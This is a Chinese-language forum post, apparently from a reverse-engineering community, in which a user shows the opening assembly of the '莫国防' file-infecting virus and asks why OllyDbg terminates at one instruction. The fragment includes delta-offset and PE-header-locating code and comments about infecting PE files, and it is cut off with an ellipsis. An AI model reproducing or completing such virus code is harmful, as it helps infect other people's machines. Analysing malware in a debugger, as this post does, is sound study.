-
-
“莫国防”病毒代码的问题
-
2006-6-16 11:49
4794
-
“莫国防”病毒代码我用ollydug在跟踪,不过跟踪不下去了
.586p
.model flat,stdcall
option casemap:none ;强制程序代码大小写敏感
include ..\INCLUDE\WINDOWS.INC ;
include ..\INCLUDE\kernel32.inc ;
include ..\INCLUDE\user32.inc ;
include ..\INCLUDE\advapi32.inc ;
include ..\INCLUDE\mpr.inc ;
includelib ..\LIB\kernel32.lib ;
includelib ..\LIB\user32.lib ;
includelib ..\LIB\advapi32.lib ;
includelib ..\LIB\mpr.lib ;
VirusSize = offset VirusEnd - offset VirusStart ;
VirusSizeP1 = offset _OtherMemPosition - offset VirusStart ;本毒在内存的感染PE文件部分
VirusSizeP2 = VirusSize - VirusSizeP1 ;本毒的后半部分,不活动
.code
VirusStart:
nop
pushfd
pushad
db 0e8h, 0, 0, 0, 0
pop ebx
mov edx, ebx
mov eax, ebx
sub ebx, $-5
sub edx, 8
call _GetModuleAddress
add eax, [eax+3ch]
mov lpOldPE[ebx], eax际地址)
......
就是跟踪到mov lpOldPE[ebx], eax指令的时候显示程序终止了,请教高手,这个是为什么啊?
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
